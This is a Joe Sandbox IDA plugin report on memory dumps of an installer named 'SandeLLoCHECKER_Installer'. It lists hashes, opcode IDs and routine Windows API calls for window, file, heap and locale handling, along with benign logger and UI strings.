                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: a59b8a0774b07fcbe7ea64d0e6d6182da98acf11b28289795b5d5c36a9d5a946
                                                                                                                        • Instruction ID: d3f9492a08c8ac394aecdbd9dddb2b711c551a40e764c89a053df2ecfb63a740
                                                                                                                        • Opcode Fuzzy Hash: a59b8a0774b07fcbe7ea64d0e6d6182da98acf11b28289795b5d5c36a9d5a946
                                                                                                                        • Instruction Fuzzy Hash: 19E0303264023196DF21BB6EBD05BDA275D9F423A0F154135EC1A96491EB20988087A0
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,C7BA013E), ref: 0099470E
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CreateFileW.KERNEL32(00B31574,C0000000,00000003,00000000,00000004,00000080,00000000,C7BA013E,00B31550,00B31568,?), ref: 00994810
                                                                                                                        • GetLastError.KERNEL32 ref: 0099482D
                                                                                                                        • OutputDebugStringW.KERNEL32(00000000), ref: 009948A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CreateDebugErrorFileHeapLastLocalOutputProcessStringTime
                                                                                                                        • String ID: %04d-%02d-%02d %02d-%02d-%02d$CPU: $LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$UnkownCPU$server$workstation$x64$x86
                                                                                                                        • API String ID: 207360571-2109833052
                                                                                                                        • Opcode ID: 9dca2e0869c40acbc5448ede220b94a6fcdfc130e06c6b5dd11ce2aaf0db3a06
                                                                                                                        • Instruction ID: b4cc493aaec57f860f4f2e488ae1b643382aef56cda7618ac72f3062a74fbe0d
                                                                                                                        • Opcode Fuzzy Hash: 9dca2e0869c40acbc5448ede220b94a6fcdfc130e06c6b5dd11ce2aaf0db3a06
                                                                                                                        • Instruction Fuzzy Hash: 8F228D71A01209DFEB10DFA8CC45BAEBBB8FF44314F148269E815EB291EB749D41CB91
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0085590B
                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0085591B
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00855926
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,?), ref: 00855934
                                                                                                                        • GetWindowLongW.USER32(00000000,000000EB), ref: 00855942
                                                                                                                        • SetWindowTextW.USER32(00000000,00AAA29C), ref: 008559E1
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00855A16
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00855A24
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00855A78
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00855ADD
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,C7BA013E,00000000), ref: 00855B2F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3555041256-0
                                                                                                                        • Opcode ID: 0e8484b6aaf060ab80ad705b04db3b6ce1b2ffa4e6cff09dd5d8837a6aa4fbd7
                                                                                                                        • Instruction ID: f3ca04300a6a1d62620fd7d057e4bb4cb4cdb3003eb274be7d824692505714e6
                                                                                                                        • Opcode Fuzzy Hash: 0e8484b6aaf060ab80ad705b04db3b6ce1b2ffa4e6cff09dd5d8837a6aa4fbd7
                                                                                                                        • Instruction Fuzzy Hash: DCE1AE71A0060ADBDB10DF68CC58BAFBBB9FF44721F144229EC15E7291DB759904CBA1
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0093FA49
                                                                                                                        • SendMessageW.USER32(?,00000443,00000000), ref: 0093FAB3
                                                                                                                        • GetDC.USER32(00000000), ref: 0093FAD7
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093FAE2
                                                                                                                        • MulDiv.KERNEL32(?,00000000), ref: 0093FAEA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDeviceMessageSendWindow
                                                                                                                        • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                        • API String ID: 629137107-2319862951
                                                                                                                        • Opcode ID: 891dc18539d498e0eb458dd89d3ce4e74c8c4f931583d0c778182f7b3c71ff76
                                                                                                                        • Instruction ID: 9dbe53609d3a6ac231f1f171fc6fba75093115b10c7493b8c2ad647cd5db4e41
                                                                                                                        • Opcode Fuzzy Hash: 891dc18539d498e0eb458dd89d3ce4e74c8c4f931583d0c778182f7b3c71ff76
                                                                                                                        • Instruction Fuzzy Hash: 05D1BF31A00609AFEB18CF28CC55BEEB7B5FF89300F108269E559A7291DB746A45CF91
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,C7BA013E,?,00000000,00000000), ref: 009A4D41
                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 009A4D5C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1690352074-0
                                                                                                                        • Opcode ID: 928396005def7ee1e4b13bf2ee1775f0f30d5faac91004381f55a7c0aedbe6a1
                                                                                                                        • Instruction ID: 50e3516cb4a5e8afe185b6668accb251f1c6f8aa901fc6506bd29f62ef72334f
                                                                                                                        • Opcode Fuzzy Hash: 928396005def7ee1e4b13bf2ee1775f0f30d5faac91004381f55a7c0aedbe6a1
                                                                                                                        • Instruction Fuzzy Hash: 3D715C71A01648DFDB10DFA8C948BEEBBB8FF45324F148169E815EB291DB749A04CB91
                                                                                                                        APIs
                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000105), ref: 009445E4
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,C7BA013E,?), ref: 0094486C
                                                                                                                        • FindNextFileW.KERNEL32(000000FF,00000010,?,C7BA013E,?), ref: 009449C3
                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,C7BA013E,?), ref: 00944A22
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNameNextPathShort
                                                                                                                        • String ID: \\?\
                                                                                                                        • API String ID: 3979292098-4282027825
                                                                                                                        • Opcode ID: 321abd12051477494f133faddecbdc65fe46111a67d702d4423cf6ba2a5337ad
                                                                                                                        • Instruction ID: a14b26bdb36ee3eb5e94d5516e99e4f099bf884971cba9fc1e543ce6147a50eb
                                                                                                                        • Opcode Fuzzy Hash: 321abd12051477494f133faddecbdc65fe46111a67d702d4423cf6ba2a5337ad
                                                                                                                        • Instruction Fuzzy Hash: 8BF1B170D00259DFDB24DF68CC99BAEB7B4FF44304F108299E419A7291EB74AA84CF91
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000C,00A157F3,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A158D9
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15900
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15907
                                                                                                                        • InitializeSListHead.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15914
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15929
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15930
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1475849761-0
                                                                                                                        • Opcode ID: 671a541de4d4941ec9bfdbc7db99e599d31974e8962b05707392d632c44392be
                                                                                                                        • Instruction ID: 1cc9fe07afb035edb1edff77cc03849534f97a4a8a85587fcdb2df4d45115969
                                                                                                                        • Opcode Fuzzy Hash: 671a541de4d4941ec9bfdbc7db99e599d31974e8962b05707392d632c44392be
                                                                                                                        • Instruction Fuzzy Hash: C5F0A435B01601DFD7209FB9ED08F9677B8FB98B52F100039E942C7250EF70D8428660
                                                                                                                        APIs
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 009600A8
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000), ref: 009601A8
                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 00960245
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 0096026B
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 009602B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess_wcsrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 352340201-0
                                                                                                                        • Opcode ID: db3649c932e17bdbe5a92139056a32f803267061d9d9b97b3e3f1c67e17cfc02
                                                                                                                        • Instruction ID: 495acdffc737ac00f2df4675f5ef44043e03e8470165a88d9a0e18941d9576f2
                                                                                                                        • Opcode Fuzzy Hash: db3649c932e17bdbe5a92139056a32f803267061d9d9b97b3e3f1c67e17cfc02
                                                                                                                        • Instruction Fuzzy Hash: 4971C671A00205DFDB14DF68CC99BAFB7B8FF95324F14862AE825D7281DB749A04CB51
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3213747228-0
                                                                                                                        • Opcode ID: 9e0b76cd5f3e377c6f2159358687fa5fc72b664d1f100b5c02f00f2f9645654f
                                                                                                                        • Instruction ID: d9282f7cd01a9c9c7f9bd53819cac26c5d0d4ad71d10d83af90d8a1726e880e3
                                                                                                                        • Opcode Fuzzy Hash: 9e0b76cd5f3e377c6f2159358687fa5fc72b664d1f100b5c02f00f2f9645654f
                                                                                                                        • Instruction Fuzzy Hash: D0B13832E042659FDB25CF6CE8817EEBBE5EF55314F14817AE804AB241E235DD81CBA0
                                                                                                                        APIs
                                                                                                                        • KillTimer.USER32(00000003,00000001,C7BA013E,?,?,?,?,00A437D4,000000FF), ref: 00863611
                                                                                                                        • GetWindowLongW.USER32(00000003,000000FC), ref: 00863626
                                                                                                                        • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00863638
                                                                                                                        • DeleteCriticalSection.KERNEL32(?,C7BA013E,?,?,?,?,00A437D4,000000FF), ref: 00863663
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$CriticalDeleteKillSectionTimer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1032004442-0
                                                                                                                        • Opcode ID: 85c2bc65097087fdbdc0ac8326405f36fcec53058ff39a08c1473e6b452bd473
                                                                                                                        • Instruction ID: 54a2d67f92475cae31f2c89f18c860624454f5161db001fae515cb115b2552b3
                                                                                                                        • Opcode Fuzzy Hash: 85c2bc65097087fdbdc0ac8326405f36fcec53058ff39a08c1473e6b452bd473
                                                                                                                        • Instruction Fuzzy Hash: 8631C070A04646FBCB21CF24CD08B9ABBB8FF15320F144229E824E7791DB71EA15DB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00000002,00AAA29C,00000000), ref: 0098A6D1
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00000002,0098A255,-00000001,00000078,-00000001), ref: 0098A70D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoInit_thread_footerLocale$HeapProcess
                                                                                                                        • String ID: %d-%s
                                                                                                                        • API String ID: 1688948774-1781338863
                                                                                                                        • Opcode ID: 73451e6e4b3003dc5e6d47c84578f9d6d1a90e61fb8dd3d203180f4d61575ed3
                                                                                                                        • Instruction ID: 0cfc63c1f47402980c65f8958b8a1feecbff35c80335a153615054caeedd957a
                                                                                                                        • Opcode Fuzzy Hash: 73451e6e4b3003dc5e6d47c84578f9d6d1a90e61fb8dd3d203180f4d61575ed3
                                                                                                                        • Instruction Fuzzy Hash: E231AD71A00609AFE704DF98CC49FAEBBB8FF44724F104669E115AB291EB719900CB91
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000004), ref: 0085F89E
                                                                                                                        • GetWindowLongW.USER32(00000004,000000FC), ref: 0085F8B7
                                                                                                                        • SetWindowLongW.USER32(00000004,000000FC,?), ref: 0085F8C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 847901565-0
                                                                                                                        • Opcode ID: 4672d844e4c20d0fc2b0e48c54c9193d532ddca76408f4527c996ba67debd8c9
                                                                                                                        • Instruction ID: 58a6541f97f0ea214a32ad9bc03ddbbfb429945edefa31006178fa93e9bf26cd
                                                                                                                        • Opcode Fuzzy Hash: 4672d844e4c20d0fc2b0e48c54c9193d532ddca76408f4527c996ba67debd8c9
                                                                                                                        • Instruction Fuzzy Hash: A0418CB0A00A46EFDB10DF65C908B5ABBB4FF05325F144239E924D7A91DB76E918CB90
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(0000001B,000000FC), ref: 008583E9
                                                                                                                        • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 008583F7
                                                                                                                        • DestroyWindow.USER32(0000001B), ref: 00858423
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$Destroy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3055081903-0
                                                                                                                        • Opcode ID: 882a92daa93b0cb0c20940c44f3cbf20521691085332990f2774f3ea4178cbcd
                                                                                                                        • Instruction ID: 99c4b4ed5931059fa55bc70286a94711b45d5202f443534a4d3e448b9d815d9d
                                                                                                                        • Opcode Fuzzy Hash: 882a92daa93b0cb0c20940c44f3cbf20521691085332990f2774f3ea4178cbcd
                                                                                                                        • Instruction Fuzzy Hash: 2EF0BD31004A12DBDB715F28ED04F967BE1BF19722F14462DE8AAD25E0DB60A8459B04
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 008B54BF
                                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,?), ref: 008B54CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378638983-0
